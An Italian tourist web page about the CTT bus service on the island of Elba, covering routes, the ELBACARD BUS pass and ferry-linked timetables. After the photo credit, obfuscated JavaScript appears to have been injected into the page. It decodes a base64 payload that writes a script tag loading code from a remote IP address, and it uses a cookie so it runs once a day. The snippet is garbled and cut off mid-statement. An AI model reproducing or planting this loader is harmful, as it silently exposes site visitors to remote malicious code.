CTT a vostra disposizione per muoversi in piena libertà sull’Isola d’Elba!
La Compagnia Toscana Trasporti, più comunemente indicata come CTT, all’Isola d’Elba garantisce un servizio pubblico di autobus di linea che permette di spostarsi senza problemi all’interno del vasto territorio elbano. Da nord a sud, da est ad ovest, durante l’intero arco dell’anno la CTT da Portoferraio collega tutte le principali località dell’isola, mentre durante la stagione estiva, che va da giugno a settembre, tale servizio viene intensificato con ulteriori mezzi che connettono il capoluogo alle principali spiagge nei comuni di Rio nell’Elba, Rio Marina, Portoferraio, Porto Azzurro, Marciana e Capoliveri. Venire in vacanza all’Elba dimenticandosi cosa sia guidare una macchina è un sogno facilmente realizzabile.
Le principali linee, oltre a quelle urbane che servono tutta la pertinenza comunale di Portoferraio, come la linea per Elba Ovest (Campo e Marciana), quella per Elba Est (Rio, Capoliveri e Porto Azzurro), ed infine quella per Bagnaia e Lacona, coprono in modo soddisfacente ogni necessità di spostamento ed il pagamento con l’ELBACARD BUS, una tessera acquistabile presso gli uffici della CTT Elba, con validità settimanale o giornaliera, in alternativa al singolo biglietto, ha in più il vantaggio di essere utilizzabile per ottenere promozioni e sconti negli esercizi dell’isola aderenti.
Gli orari CTT all’Elba sono organizzati in base alle partenze ed all’arrivo delle navi da Piombino. Per questo motivo, essendo la stazione degli autobus proprio sul porto, non c’è da preoccuparsi se si è in ritardo, perché i conducenti stessi aspettano la coincidenza con i traghetti. Il terminal si trova all’interno dell’autostazione ed è dotato di servizi igienici ed aria condizionata. Per chi fosse interessato, è possibile consultare gli orari CTT per l’Isola d’Elba, visitando il sito ufficiale CTT Nord, nella sezione ad essa dedicata. Sul sito troverete anche informazioni relative ai collegamenti da Piombino delle linee bus per la stazione di Firenze o quella che arriva fino a Milano.
Foto di asvipe.altervista.org _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘